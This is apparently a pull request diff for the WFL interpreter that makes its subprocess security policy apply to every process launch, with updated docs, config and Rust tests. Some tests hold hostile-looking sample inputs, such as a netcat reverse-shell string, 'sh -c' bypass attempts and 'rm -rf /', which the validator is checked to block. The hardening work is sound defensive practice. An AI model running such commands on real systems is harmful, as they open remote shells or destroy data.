### PR TITLE
fix(security): enforce subprocess policy on direct-exec path

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,26 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 
 ## [Unreleased]
 
+### Security
+- **Subprocess policy is enforced on every process launch** (shell path and
+  direct-exec / `with arguments` path). Previously, `shell_execution_mode` and
+  related checks ran only when the engine believed a shell was required, so
+  forms such as `execute command "sh" with arguments ["-c", "..."]` bypassed
+  the default `forbidden` policy.
+- **`allow_shell_execution` is now enforced** as a master switch: when `false`
+  (the default), all `execute command` / `spawn command` launches are blocked.
+- **Secure defaults deny all external processes.** To opt in for local tooling:
+
+  ```ini
+  allow_shell_execution = true
+  shell_execution_mode = sanitized
+  # or: shell_execution_mode = allowlist_only
+  #     allowed_shell_commands = echo, ls, git
+  ```
+
+- README and configuration docs updated to describe the real policy (subprocess
+  execution disabled by default; not a free “sandboxed” escape hatch).
+
 ### Added
 - HTTP request query string access: raw query is available as `query` / `query of req` (no leading `?`) so `parse_query_string of query` works on real requests (#597)
 - Configurable request body size limit via `.wflcfg` `web_server_max_body_size` (default still 1 MiB) (#597)

--- a/Dev diary/2026-07-11-subprocess-policy-enforcement.md
+++ b/Dev diary/2026-07-11-subprocess-policy-enforcement.md
@@ -1,0 +1,36 @@
+# Dev Diary — Subprocess policy enforcement (2026-07-11)
+
+## Summary
+
+Closed a critical sandbox bypass: subprocess security policy only ran when the
+interpreter thought a *shell* was required. Direct `Command::new` paths (non-empty
+`with arguments`, or command strings without shell metacharacters) never consulted
+`shell_execution_mode` or `allow_shell_execution`.
+
+## What changed
+
+- Single gate: `CommandSanitizer::authorize_process_execution`, called from both
+  `execute_command` and `spawn_process` before any `Command::new`.
+- `allow_shell_execution = false` (default) hard-denies all process execution.
+- `shell_execution_mode = forbidden` (default) also denies all process execution
+  when the master switch is on; `allowlist_only` / `sanitized` / `unrestricted`
+  apply to every launch path.
+- Docs, README, CHANGELOG, and TestPrograms local `.wflcfg` updated for the
+  intentional secure-by-default behavior change.
+
+## Migration
+
+Programs that intentionally run external tools must set `.wflcfg`:
+
+```ini
+allow_shell_execution = true
+shell_execution_mode = sanitized
+```
+
+Prefer `allowlist_only` on hosts that handle untrusted code.
+
+## Out of scope (follow-ups)
+
+- Main-loop wall-clock timeout exemption as a capability
+- Release-build recursion cap (today `debug_assert!`)
+- Restricting sqlx network drivers for playground/restricted builds

--- a/Docs/04-advanced-features/subprocess-execution.md
+++ b/Docs/04-advanced-features/subprocess-execution.md
@@ -2,6 +2,31 @@
 
 WFL lets you run external commands and programs. Integrate with system tools, build automation scripts, and extend WFL's capabilities.
 
+## Security: opt-in required
+
+**By default, all subprocess execution is disabled.** Both
+`execute command` and `spawn command` are blocked unless you enable them in
+`.wflcfg`:
+
+```ini
+# .wflcfg — required before any execute/spawn will run
+allow_shell_execution = true
+shell_execution_mode = sanitized
+# Tighter alternative:
+# shell_execution_mode = allowlist_only
+# allowed_shell_commands = echo, ls, git
+```
+
+- `allow_shell_execution = false` (default) blocks **every** process launch.
+- `shell_execution_mode = forbidden` (default) also blocks every process launch
+  when the master switch is on.
+- Policy applies to **both** the shell form and the `with arguments` form.
+  Passing arguments is safer against injection *after* a program is allowed;
+  it is not a bypass of the policy.
+
+See [Configuration Reference](../reference/configuration-reference.md#security-settings)
+for full option details.
+
 ## Why Subprocess Execution?
 
 Run external programs from WFL:
@@ -15,7 +40,7 @@ Run external programs from WFL:
 
 ### Execute and Wait
 
-Run a command and wait for it to complete:
+Run a command and wait for it to complete (requires opt-in config above):
 
 ```wfl
 wait for execute command "echo Hello from command line" as result
@@ -267,7 +292,15 @@ display "All tasks finished"
 
 ## Security Considerations
 
-⚠️ **Important:** Subprocess execution can be dangerous!
+⚠️ **Important:** Subprocess execution can be dangerous. WFL disables it by
+default; enable it only when needed, preferably with `allowlist_only`.
+
+### Policy layers
+
+1. **Config policy** (`.wflcfg`) — master switch + mode/allowlist, enforced on
+   every launch (shell and direct-exec).
+2. **Program design** — never splice untrusted input into a command string;
+   pass values with `with arguments` and restrict which programs run.
 
 ### Command Injection
 
@@ -278,9 +311,10 @@ store cmd as "echo " with user_input
 wait for execute command cmd  // UNSAFE: user input goes straight into the command!
 ```
 
-**Safe:** Don't try to filter out "dangerous" characters — blocklists are always
-incomplete. Instead, restrict the input to a set of approved values (an allowlist)
-and pass it as an argument, so it is never spliced into a shell command string.
+**Safer (after opt-in config allows `echo`):** Don't try to filter out
+"dangerous" characters — blocklists are always incomplete. Restrict input to
+approved values and pass them as arguments so they are never spliced into a
+shell command string.
 
 ```wfl
 store user_input as "hello"  // Untrusted input from a user or request
@@ -297,19 +331,21 @@ end check
 
 ### Best Practices
 
+✅ **Leave defaults off** for untrusted or public-facing hosts
+
+✅ **Prefer `allowlist_only`** when you must enable subprocesses
+
 ✅ **Validate all input** - Never trust user data
 
-✅ **Use whitelists** - Only allow specific commands
-
-✅ **Sanitize paths** - Prevent directory traversal
+✅ **Pass arguments, don't concatenate** - Avoid shell metacharacters
 
 ✅ **Limit permissions** - Run with minimal privileges
 
 ✅ **Log commands** - Track what's being executed
 
-❌ **Don't use user input directly** - Always validate
+❌ **Don't enable `unrestricted` in production**
 
-❌ **Don't execute arbitrary commands** - Whitelist allowed commands
+❌ **Don't assume `with arguments` bypasses policy** - it does not
 
 ❌ **Don't ignore exit codes** - Check for failures
 

--- a/Docs/reference/configuration-reference.md
+++ b/Docs/reference/configuration-reference.md
@@ -190,11 +190,14 @@ Requires consistent casing for keywords throughout the script.
 
 ### Security Settings
 
-These settings control subprocess execution and shell command security.
+These settings control **all** subprocess execution (`execute command` and
+`spawn command`), on both the shell path and the direct-exec / argv path.
+Policy is always checked before any process is started.
 
 #### allow_shell_execution
 
-Master switch for shell command execution. When `false`, all shell commands are blocked.
+Master switch for subprocess execution. When `false`, **all** process launches
+are blocked (shell form and `with arguments` form). This is the secure default.
 
 - **Type:** Boolean
 - **Default:** `false`
@@ -202,21 +205,39 @@ Master switch for shell command execution. When `false`, all shell commands are 
 
 #### shell_execution_mode
 
-Controls how shell commands are validated and executed.
+Controls how subprocesses are authorized when `allow_shell_execution = true`.
+Applied to every launch, not only shell metacharacter forms.
 
 - **Type:** String
 - **Default:** `forbidden`
 - **Options:**
-  - `forbidden` - No shell execution allowed (most secure)
-  - `allowlist_only` - Only commands in `allowed_shell_commands` can run
-  - `sanitized` - Shell execution with validation and warnings
-  - `unrestricted` - Legacy mode, not recommended for production
+  - `forbidden` - No process execution allowed (most secure)
+  - `allowlist_only` - Only programs whose basename is in `allowed_shell_commands` may run
+  - `sanitized` - Any program may run; shell features produce warnings
+  - `unrestricted` - Any program may run with shell; not recommended for production
 
 - **Example:** `shell_execution_mode = allowlist_only`
 
+To opt in for local tooling (after enabling the master switch):
+
+```ini
+allow_shell_execution = true
+shell_execution_mode = sanitized
+```
+
+Or tighter:
+
+```ini
+allow_shell_execution = true
+shell_execution_mode = allowlist_only
+allowed_shell_commands = echo, ls, git
+```
+
 #### allowed_shell_commands
 
-Comma-separated list of allowed shell commands when using `allowlist_only` mode.
+Comma-separated list of allowed **program basenames** when using
+`allowlist_only` mode. Matching uses the basename of the program path
+(`/bin/echo` matches `echo`). On Windows, comparison is case-insensitive.
 
 - **Type:** Comma-separated strings
 - **Default:** (empty)
@@ -346,7 +367,7 @@ max_line_length = 100
 max_nesting_depth = 4
 snake_case_variables = true
 
-# Secure shell execution
+# Secure subprocess policy (default): no external processes
 allow_shell_execution = false
 shell_execution_mode = forbidden
 

--- a/README.md
+++ b/README.md
@@ -22,7 +22,8 @@ Hello, World!
 - **Reads like English.** `check if score is greater than 90:` — no cryptic
   symbols to memorize.
 - **Safe by default.** Static typing with inference, clear Elm-style error
-  messages, and secure defaults (output escaping, sandboxed subprocesses).
+  messages, and secure defaults (output escaping; subprocess execution disabled
+  unless opted in via `.wflcfg`).
 - **Batteries included.** Text, math, lists, filesystem I/O, crypto, time,
   async/await, pattern matching, containers (objects), an HTTP client, and a
   built-in web server.

--- a/TestPrograms/.wflcfg
+++ b/TestPrograms/.wflcfg
@@ -1,0 +1,5 @@
+# Permissive subprocess policy for intentional TestPrograms demos only.
+# Repo-root and production defaults remain secure (deny all process execution).
+allow_shell_execution = true
+shell_execution_mode = sanitized
+warn_on_shell_execution = false

--- a/src/interpreter/command_sanitizer.rs
+++ b/src/interpreter/command_sanitizer.rs
@@ -164,62 +164,124 @@ impl CommandSanitizer {
         false
     }
 
-    /// Validate command against security policy
-    pub fn validate_command(&self, command: &str) -> Result<ValidationResult, String> {
-        // Check if command contains shell features
-        let has_shell_features = Self::contains_shell_metacharacters(command);
-
-        if !has_shell_features {
-            return Ok(ValidationResult::Safe);
+    /// Authorize any subprocess launch (shell path or direct-exec).
+    ///
+    /// This is the single policy gate used before `Command::new` on both the
+    /// execute-command and spawn-process paths. Defaults deny all process
+    /// execution (`allow_shell_execution = false` and/or
+    /// `shell_execution_mode = forbidden`).
+    pub fn authorize_process_execution(
+        &self,
+        program: &str,
+        needs_shell: bool,
+        command_for_analysis: &str,
+    ) -> Result<ValidationResult, String> {
+        // Master switch: when false, all subprocess execution is blocked.
+        if !self.config.allow_shell_execution {
+            return Ok(ValidationResult::Blocked {
+                reason: "Subprocess execution is disabled (allow_shell_execution = false)"
+                    .to_string(),
+            });
         }
 
-        // Command has shell features - check policy
+        let program_base = Self::program_basename(program);
+
         match self.config.shell_execution_mode {
             ShellExecutionMode::Forbidden => Ok(ValidationResult::Blocked {
-                reason: "Shell execution is disabled by security policy".to_string(),
+                reason: "Subprocess execution is disabled by security policy \
+                         (shell_execution_mode = forbidden)"
+                    .to_string(),
             }),
             ShellExecutionMode::AllowlistOnly => {
-                if self.is_allowlisted(command) {
-                    Ok(ValidationResult::RequiresShell {
-                        reason: "Command is allowlisted".to_string(),
-                        warnings: vec!["Using shell execution (allowlisted)".to_string()],
-                    })
+                if self.is_program_allowlisted(&program_base) {
+                    if needs_shell {
+                        Ok(ValidationResult::RequiresShell {
+                            reason: "Command is allowlisted".to_string(),
+                            warnings: vec!["Using shell execution (allowlisted)".to_string()],
+                        })
+                    } else {
+                        Ok(ValidationResult::Safe)
+                    }
                 } else {
                     Ok(ValidationResult::Blocked {
                         reason: format!(
-                            "Command '{}' is not in the allowlist",
-                            self.get_command_base(command)
+                            "Program '{}' is not in the allowlist (allowed_shell_commands)",
+                            program_base
                         ),
                     })
                 }
             }
             ShellExecutionMode::Sanitized => {
-                let warnings = self.analyze_shell_features(command);
-                Ok(ValidationResult::RequiresShell {
-                    reason: "Command contains shell features".to_string(),
-                    warnings,
-                })
+                if needs_shell {
+                    let warnings = self.analyze_shell_features(command_for_analysis);
+                    Ok(ValidationResult::RequiresShell {
+                        reason: "Command contains shell features".to_string(),
+                        warnings,
+                    })
+                } else {
+                    Ok(ValidationResult::Safe)
+                }
             }
-            ShellExecutionMode::Unrestricted => Ok(ValidationResult::RequiresShell {
-                reason: "Unrestricted shell mode enabled".to_string(),
-                warnings: vec!["⚠️ Using unrestricted shell execution".to_string()],
-            }),
+            ShellExecutionMode::Unrestricted => {
+                if needs_shell {
+                    Ok(ValidationResult::RequiresShell {
+                        reason: "Unrestricted shell mode enabled".to_string(),
+                        warnings: vec!["⚠️ Using unrestricted shell execution".to_string()],
+                    })
+                } else {
+                    Ok(ValidationResult::Safe)
+                }
+            }
         }
     }
 
-    /// Check if command is in the allowlist
-    pub fn is_allowlisted(&self, command: &str) -> bool {
-        let base_command = self.get_command_base(command);
-
-        self.config
-            .allowed_shell_commands
-            .iter()
-            .any(|allowed| allowed == &base_command)
+    /// Validate a full command string against security policy.
+    ///
+    /// Resolves the program name from the command string and delegates to
+    /// [`authorize_process_execution`]. Kept for callers that only have the
+    /// raw command line.
+    pub fn validate_command(&self, command: &str) -> Result<ValidationResult, String> {
+        let has_shell_features = Self::contains_shell_metacharacters(command);
+        let program = match Self::parse_command(command) {
+            Ok((prog, _)) => prog,
+            Err(_) => self.get_command_base(command),
+        };
+        self.authorize_process_execution(&program, has_shell_features, command)
     }
 
-    /// Extract the base command from a command string
+    /// Check if a program (or command string) is in the allowlist
+    pub fn is_allowlisted(&self, command: &str) -> bool {
+        let base_command = Self::program_basename(&self.get_command_base(command));
+        self.is_program_allowlisted(&base_command)
+    }
+
+    fn is_program_allowlisted(&self, program_base: &str) -> bool {
+        self.config.allowed_shell_commands.iter().any(|allowed| {
+            let allowed_base = Self::program_basename(allowed);
+            #[cfg(windows)]
+            {
+                allowed_base.eq_ignore_ascii_case(program_base)
+            }
+            #[cfg(not(windows))]
+            {
+                allowed_base == program_base
+            }
+        })
+    }
+
+    /// Extract the first whitespace-separated token from a command string
     fn get_command_base(&self, command: &str) -> String {
         command.split_whitespace().next().unwrap_or("").to_string()
+    }
+
+    /// Basename of a program path (`/bin/echo` → `echo`, `C:\\Windows\\cmd.exe` → `cmd.exe`)
+    pub fn program_basename(program: &str) -> String {
+        let trimmed = program.trim().trim_matches('"').trim_matches('\'');
+        trimmed
+            .rsplit(['/', '\\'])
+            .next()
+            .unwrap_or(trimmed)
+            .to_string()
     }
 
     /// Analyze shell features and provide warnings
@@ -263,10 +325,15 @@ mod tests {
 
     fn test_config(mode: ShellExecutionMode) -> Arc<WflConfig> {
         let config = WflConfig {
+            allow_shell_execution: true,
             shell_execution_mode: mode,
             ..Default::default()
         };
         Arc::new(config)
+    }
+
+    fn default_secure_config() -> Arc<WflConfig> {
+        Arc::new(WflConfig::default())
     }
 
     #[test]
@@ -393,10 +460,50 @@ mod tests {
     }
 
     #[test]
-    fn test_validate_command_safe() {
+    fn test_default_config_blocks_all_process_execution() {
+        let sanitizer = CommandSanitizer::new(default_secure_config());
+        // Direct-exec style programs must be blocked under secure defaults
+        for cmd in ["echo hello", "sh", "nc -e /bin/sh host 4444"] {
+            let result = sanitizer.validate_command(cmd).unwrap();
+            assert!(
+                matches!(result, ValidationResult::Blocked { .. }),
+                "default config must block '{}', got {:?}",
+                cmd,
+                result
+            );
+        }
+    }
+
+    #[test]
+    fn test_authorize_blocks_when_allow_shell_execution_false() {
+        let config = WflConfig {
+            allow_shell_execution: false,
+            shell_execution_mode: ShellExecutionMode::Sanitized,
+            ..Default::default()
+        };
+        let sanitizer = CommandSanitizer::new(Arc::new(config));
+        let result = sanitizer
+            .authorize_process_execution("echo", false, "echo")
+            .unwrap();
+        match result {
+            ValidationResult::Blocked { reason } => {
+                assert!(reason.contains("allow_shell_execution"));
+            }
+            other => panic!("Expected Blocked, got {:?}", other),
+        }
+    }
+
+    #[test]
+    fn test_authorize_forbidden_blocks_direct_exec() {
         let sanitizer = CommandSanitizer::new(test_config(ShellExecutionMode::Forbidden));
-        let result = sanitizer.validate_command("echo hello").unwrap();
-        assert_eq!(result, ValidationResult::Safe);
+        let result = sanitizer
+            .authorize_process_execution("sh", false, "sh")
+            .unwrap();
+        assert!(matches!(result, ValidationResult::Blocked { .. }));
+        let result = sanitizer
+            .authorize_process_execution("echo", false, "echo")
+            .unwrap();
+        assert!(matches!(result, ValidationResult::Blocked { .. }));
     }
 
     #[test]
@@ -404,6 +511,16 @@ mod tests {
         let sanitizer = CommandSanitizer::new(test_config(ShellExecutionMode::Forbidden));
         let result = sanitizer.validate_command("echo $HOME").unwrap();
         assert!(matches!(result, ValidationResult::Blocked { .. }));
+        // Forbidden also blocks non-shell direct-exec
+        let result = sanitizer.validate_command("echo hello").unwrap();
+        assert!(matches!(result, ValidationResult::Blocked { .. }));
+    }
+
+    #[test]
+    fn test_validate_command_sanitized_direct_exec_safe() {
+        let sanitizer = CommandSanitizer::new(test_config(ShellExecutionMode::Sanitized));
+        let result = sanitizer.validate_command("echo hello").unwrap();
+        assert_eq!(result, ValidationResult::Safe);
     }
 
     #[test]
@@ -428,8 +545,37 @@ mod tests {
     }
 
     #[test]
+    fn test_authorize_allowlist_only() {
+        let config = WflConfig {
+            allow_shell_execution: true,
+            shell_execution_mode: ShellExecutionMode::AllowlistOnly,
+            allowed_shell_commands: vec!["echo".to_string(), "ls".to_string()],
+            ..Default::default()
+        };
+        let sanitizer = CommandSanitizer::new(Arc::new(config));
+
+        let ok = sanitizer
+            .authorize_process_execution("echo", false, "echo")
+            .unwrap();
+        assert_eq!(ok, ValidationResult::Safe);
+
+        let blocked = sanitizer
+            .authorize_process_execution("rm", false, "rm")
+            .unwrap();
+        assert!(matches!(blocked, ValidationResult::Blocked { .. }));
+
+        // Path basename matching
+        let path_ok = sanitizer
+            .authorize_process_execution("/bin/echo", false, "/bin/echo")
+            .unwrap();
+        assert_eq!(path_ok, ValidationResult::Safe);
+    }
+
+    #[test]
     fn test_is_allowlisted() {
         let config = WflConfig {
+            allow_shell_execution: true,
+            shell_execution_mode: ShellExecutionMode::AllowlistOnly,
             allowed_shell_commands: vec!["echo".to_string(), "ls".to_string()],
             ..Default::default()
         };
@@ -438,6 +584,16 @@ mod tests {
         assert!(sanitizer.is_allowlisted("echo hello"));
         assert!(sanitizer.is_allowlisted("ls -la"));
         assert!(!sanitizer.is_allowlisted("rm -rf /"));
+    }
+
+    #[test]
+    fn test_program_basename() {
+        assert_eq!(CommandSanitizer::program_basename("echo"), "echo");
+        assert_eq!(CommandSanitizer::program_basename("/bin/echo"), "echo");
+        assert_eq!(
+            CommandSanitizer::program_basename(r"C:\Windows\System32\cmd.exe"),
+            "cmd.exe"
+        );
     }
 
     #[test]

--- a/src/interpreter/mod.rs
+++ b/src/interpreter/mod.rs
@@ -1267,6 +1267,65 @@ impl IoClient {
 
     // Subprocess management methods
 
+    /// Shared subprocess policy gate for execute + spawn (shell and direct-exec).
+    fn authorize_subprocess(
+        &self,
+        command: &str,
+        args: &[&str],
+        use_shell: bool,
+        line: usize,
+        column: usize,
+    ) -> Result<bool, String> {
+        use crate::interpreter::command_sanitizer::{CommandSanitizer, ValidationResult};
+
+        let needs_shell = use_shell
+            || (args.is_empty() && CommandSanitizer::contains_shell_metacharacters(command));
+
+        // Resolve program name for policy (must happen before any Command::new)
+        let program = if args.is_empty() && !needs_shell {
+            CommandSanitizer::parse_command(command)
+                .map(|(p, _)| p)
+                .unwrap_or_else(|_| command.to_string())
+        } else if args.is_empty() && needs_shell {
+            // Shell path: policy uses the first token for allowlist matching
+            command
+                .split_whitespace()
+                .next()
+                .unwrap_or(command)
+                .to_string()
+        } else {
+            command.to_string()
+        };
+
+        let sanitizer = CommandSanitizer::new(Arc::clone(&self.config));
+        match sanitizer.authorize_process_execution(&program, needs_shell, command)? {
+            ValidationResult::Safe => Ok(needs_shell),
+            ValidationResult::RequiresShell { warnings, .. } => {
+                if self.config.warn_on_shell_execution {
+                    eprintln!("⚠️  Security Warning (line {}, column {}):", line, column);
+                    eprintln!("   Shell execution enabled for command: {}", command);
+                    for warning in warnings {
+                        eprintln!("   - {}", warning);
+                    }
+                    eprintln!(
+                        "   Prefer: execute command \"program\" with arguments [\"arg1\", \"arg2\"] \
+                         after allowing the program in .wflcfg."
+                    );
+                }
+                Ok(needs_shell)
+            }
+            ValidationResult::Blocked { reason } => Err(format!(
+                "Command blocked by security policy: {}\n\
+                 Subprocess execution is disabled by default. To allow it, update .wflcfg:\n\
+                   allow_shell_execution = true\n\
+                   shell_execution_mode = allowlist_only   # or sanitized / unrestricted\n\
+                   allowed_shell_commands = echo, ls       # required for allowlist_only\n\
+                 (line {}, column {})",
+                reason, line, column
+            )),
+        }
+    }
+
     /// Execute a command and wait for it to complete, returning (stdout, stderr, exit_code)
     #[allow(dead_code)]
     async fn execute_command(
@@ -1277,42 +1336,10 @@ impl IoClient {
         line: usize,
         column: usize,
     ) -> Result<(String, String, i32), String> {
-        use crate::interpreter::command_sanitizer::{CommandSanitizer, ValidationResult};
+        use crate::interpreter::command_sanitizer::CommandSanitizer;
         use tokio::process::Command;
 
-        // Determine if shell execution is needed
-        let needs_shell = use_shell
-            || (args.is_empty() && CommandSanitizer::contains_shell_metacharacters(command));
-
-        // Security validation if shell is needed
-        if needs_shell {
-            let sanitizer = CommandSanitizer::new(Arc::clone(&self.config));
-            match sanitizer.validate_command(command)? {
-                ValidationResult::Safe => {
-                    // No shell needed after all
-                }
-                ValidationResult::RequiresShell { warnings, .. } => {
-                    // Shell is needed, show warnings if configured
-                    if self.config.warn_on_shell_execution {
-                        eprintln!("⚠️  Security Warning (line {}, column {}):", line, column);
-                        eprintln!("   Shell execution enabled for command: {}", command);
-                        for warning in warnings {
-                            eprintln!("   - {}", warning);
-                        }
-                        eprintln!("   Consider using 'with arguments' syntax for safer execution.");
-                    }
-                }
-                ValidationResult::Blocked { reason } => {
-                    return Err(format!(
-                        "Command blocked by security policy: {}\n\
-                         To allow shell execution, update the configuration in .wflcfg:\n\
-                         shell_execution_mode = \"sanitized\"  # or \"unrestricted\"\n\
-                         Or use safe execution: execute command \"program\" with arguments [\"arg1\", \"arg2\"]",
-                        reason
-                    ));
-                }
-            }
-        }
+        let needs_shell = self.authorize_subprocess(command, args, use_shell, line, column)?;
 
         // Build the command
         let mut cmd = if needs_shell && (use_shell || args.is_empty()) {
@@ -1331,7 +1358,7 @@ impl IoClient {
                 cmd
             }
         } else {
-            // Safe path: parse and execute directly
+            // Direct-exec path (still policy-gated above)
             let (program, parsed_args) = if args.is_empty() {
                 CommandSanitizer::parse_command(command)?
             } else {
@@ -1369,7 +1396,7 @@ impl IoClient {
         line: usize,
         column: usize,
     ) -> Result<String, String> {
-        use crate::interpreter::command_sanitizer::{CommandSanitizer, ValidationResult};
+        use crate::interpreter::command_sanitizer::CommandSanitizer;
         use tokio::io::AsyncReadExt;
         use tokio::process::Command;
 
@@ -1389,39 +1416,7 @@ impl IoClient {
             }
         }
 
-        // Determine if shell execution is needed
-        let needs_shell = use_shell
-            || (args.is_empty() && CommandSanitizer::contains_shell_metacharacters(command));
-
-        // Security validation if shell is needed
-        if needs_shell {
-            let sanitizer = CommandSanitizer::new(Arc::clone(&self.config));
-            match sanitizer.validate_command(command)? {
-                ValidationResult::Safe => {
-                    // No shell needed after all
-                }
-                ValidationResult::RequiresShell { warnings, .. } => {
-                    // Shell is needed, show warnings if configured
-                    if self.config.warn_on_shell_execution {
-                        eprintln!("⚠️  Security Warning (line {}, column {}):", line, column);
-                        eprintln!("   Shell execution enabled for command: {}", command);
-                        for warning in warnings {
-                            eprintln!("   - {}", warning);
-                        }
-                        eprintln!("   Consider using 'with arguments' syntax for safer execution.");
-                    }
-                }
-                ValidationResult::Blocked { reason } => {
-                    return Err(format!(
-                        "Command blocked by security policy: {}\n\
-                         To allow shell execution, update the configuration in .wflcfg:\n\
-                         shell_execution_mode = \"sanitized\"  # or \"unrestricted\"\n\
-                         Or use safe execution: spawn command \"program\" with arguments [\"arg1\", \"arg2\"] as proc_id",
-                        reason
-                    ));
-                }
-            }
-        }
+        let needs_shell = self.authorize_subprocess(command, args, use_shell, line, column)?;
 
         // Build the command
         let mut cmd = if needs_shell && (use_shell || args.is_empty()) {
@@ -1440,7 +1435,7 @@ impl IoClient {
                 cmd
             }
         } else {
-            // Safe path: parse and execute directly
+            // Direct-exec path (still policy-gated above)
             let (program, parsed_args) = if args.is_empty() {
                 CommandSanitizer::parse_command(command)?
             } else {
@@ -9752,18 +9747,70 @@ mod header_lookup_tests {
 #[cfg(test)]
 mod process_tests {
     use super::*;
+    use crate::config::ShellExecutionMode;
+
+    /// Config that permits subprocesses for lifecycle tests (not the secure default).
+    fn permissive_process_config() -> Arc<WflConfig> {
+        Arc::new(WflConfig {
+            allow_shell_execution: true,
+            shell_execution_mode: ShellExecutionMode::Sanitized,
+            warn_on_shell_execution: false,
+            ..Default::default()
+        })
+    }
+
+    #[tokio::test]
+    async fn test_default_config_blocks_direct_exec() {
+        let client = IoClient::new(Arc::new(WflConfig::default()));
+        let result = client
+            .execute_command("echo", &["hello"], false, 0, 0)
+            .await;
+        assert!(
+            result.is_err(),
+            "Default config must deny direct-exec; got {:?}",
+            result
+        );
+        let err = result.unwrap_err();
+        assert!(
+            err.contains("security policy") || err.contains("blocked") || err.contains("disabled"),
+            "Error should mention policy: {}",
+            err
+        );
+    }
+
+    #[tokio::test]
+    async fn test_default_config_blocks_shell_interpreter_args() {
+        let client = IoClient::new(Arc::new(WflConfig::default()));
+        #[cfg(windows)]
+        let result = client
+            .execute_command("cmd.exe", &["/C", "echo pwned"], false, 0, 0)
+            .await;
+        #[cfg(not(windows))]
+        let result = client
+            .execute_command("sh", &["-c", "echo pwned"], false, 0, 0)
+            .await;
+        assert!(
+            result.is_err(),
+            "Default config must deny shell-with-args bypass; got {:?}",
+            result
+        );
+    }
 
     #[tokio::test]
     async fn test_execute_simple_command() {
-        let config = Arc::new(WflConfig::default());
-        let client = IoClient::new(config);
+        let client = IoClient::new(permissive_process_config());
 
-        // Use safe argument-based execution (no shell)
+        // Use a real platform binary (Windows has no standalone `echo.exe`)
+        #[cfg(windows)]
+        let result = client
+            .execute_command("cmd.exe", &["/C", "echo hello"], false, 0, 0)
+            .await;
+        #[cfg(not(windows))]
         let result = client
             .execute_command("echo", &["hello"], false, 0, 0)
             .await;
 
-        assert!(result.is_ok(), "Failed to execute command");
+        assert!(result.is_ok(), "Failed to execute command: {:?}", result);
         let (stdout, stderr, exit_code) = result.unwrap();
         assert!(stdout.contains("hello"), "Output should contain 'hello'");
         assert_eq!(exit_code, 0, "Exit code should be 0 for successful command");
@@ -9776,8 +9823,7 @@ mod process_tests {
     #[cfg(unix)]
     #[tokio::test]
     async fn test_spawn_and_kill_process() {
-        let config = Arc::new(WflConfig::default());
-        let client = IoClient::new(config);
+        let client = IoClient::new(permissive_process_config());
 
         // Unix-specific test using sleep command
         let proc_id = client
@@ -9810,8 +9856,7 @@ mod process_tests {
     #[cfg(windows)]
     #[tokio::test]
     async fn test_spawn_and_kill_process() {
-        let config = Arc::new(WflConfig::default());
-        let client = IoClient::new(config);
+        let client = IoClient::new(permissive_process_config());
 
         // Windows-specific test using timeout command
         let proc_id = client
@@ -9843,10 +9888,14 @@ mod process_tests {
 
     #[tokio::test]
     async fn test_capture_process_output() {
-        let config = Arc::new(WflConfig::default());
-        let client = IoClient::new(config);
+        let client = IoClient::new(permissive_process_config());
 
-        // Use shell command that works cross-platform (no args = shell execution)
+        #[cfg(windows)]
+        let proc_id = client
+            .spawn_process("cmd.exe", &["/C", "echo test output"], false, 0, 0)
+            .await
+            .expect("Failed to spawn process");
+        #[cfg(not(windows))]
         let proc_id = client
             .spawn_process("echo", &["test output"], false, 0, 0)
             .await
@@ -9868,10 +9917,14 @@ mod process_tests {
 
     #[tokio::test]
     async fn test_wait_for_process_completion() {
-        let config = Arc::new(WflConfig::default());
-        let client = IoClient::new(config);
+        let client = IoClient::new(permissive_process_config());
 
-        // Use shell command that works cross-platform (no args = shell execution)
+        #[cfg(windows)]
+        let proc_id = client
+            .spawn_process("cmd.exe", &["/C", "echo done"], false, 0, 0)
+            .await
+            .expect("Failed to spawn process");
+        #[cfg(not(windows))]
         let proc_id = client
             .spawn_process("echo", &["done"], false, 0, 0)
             .await
@@ -9887,8 +9940,7 @@ mod process_tests {
 
     #[tokio::test]
     async fn test_command_not_found() {
-        let config = Arc::new(WflConfig::default());
-        let client = IoClient::new(config);
+        let client = IoClient::new(permissive_process_config());
 
         // With shell execution, the shell runs successfully but reports command not found
         // So we check for non-zero exit code or error in stderr

--- a/src/wfl_config/checker.rs
+++ b/src/wfl_config/checker.rs
@@ -304,7 +304,8 @@ impl ConfigChecker {
                 config_type: ConfigType::Boolean,
                 required: false,
                 default_value: Some("false".to_string()),
-                description: "Allow shell command execution".to_string(),
+                description: "Master switch: allow any subprocess execution (execute/spawn)"
+                    .to_string(),
                 valid_values: None,
                 category: "Security".to_string(),
             },
@@ -317,7 +318,9 @@ impl ConfigChecker {
                 config_type: ConfigType::ShellMode,
                 required: false,
                 default_value: Some("forbidden".to_string()),
-                description: "Shell execution security mode".to_string(),
+                description:
+                    "Subprocess security mode (forbidden/allowlist_only/sanitized/unrestricted)"
+                        .to_string(),
                 valid_values: Some(vec![
                     "forbidden".to_string(),
                     "allowlist_only".to_string(),

--- a/tests/subprocess_cleanup_test.rs
+++ b/tests/subprocess_cleanup_test.rs
@@ -1,28 +1,40 @@
 use std::fs;
 use std::process::Command;
-use tempfile::NamedTempFile;
+use tempfile::TempDir;
 
-/// Robust temporary file cleanup wrapper
-struct TempWflFile {
-    _file: NamedTempFile,
-    path: String,
+/// Temp directory with a `.wfl` program and permissive `.wflcfg` for intentional subprocess tests.
+struct TempWflEnv {
+    _dir: TempDir,
+    program_path: String,
 }
 
-impl TempWflFile {
+impl TempWflEnv {
     fn new(code: &str) -> Result<Self, std::io::Error> {
-        let file = NamedTempFile::with_suffix(".wfl")?;
-        fs::write(file.path(), code)?;
-        let path = file.path().to_string_lossy().to_string();
-        Ok(TempWflFile { _file: file, path })
+        let dir = TempDir::new()?;
+        // Cleanup/resource tests intentionally spawn processes; opt in explicitly.
+        fs::write(
+            dir.path().join(".wflcfg"),
+            r#"
+allow_shell_execution = true
+shell_execution_mode = sanitized
+warn_on_shell_execution = false
+"#,
+        )?;
+        let program_path = dir.path().join("test_program.wfl");
+        fs::write(&program_path, code)?;
+        Ok(TempWflEnv {
+            _dir: dir,
+            program_path: program_path.to_string_lossy().to_string(),
+        })
     }
 
     fn path(&self) -> &str {
-        &self.path
+        &self.program_path
     }
 }
 
 fn run_wfl(code: &str) -> Result<String, String> {
-    let temp_file = TempWflFile::new(code).expect("Failed to create temp file");
+    let env = TempWflEnv::new(code).expect("Failed to create temp WFL env");
 
     let wfl_exe = if cfg!(target_os = "windows") {
         "target/release/wfl.exe"
@@ -31,7 +43,7 @@ fn run_wfl(code: &str) -> Result<String, String> {
     };
 
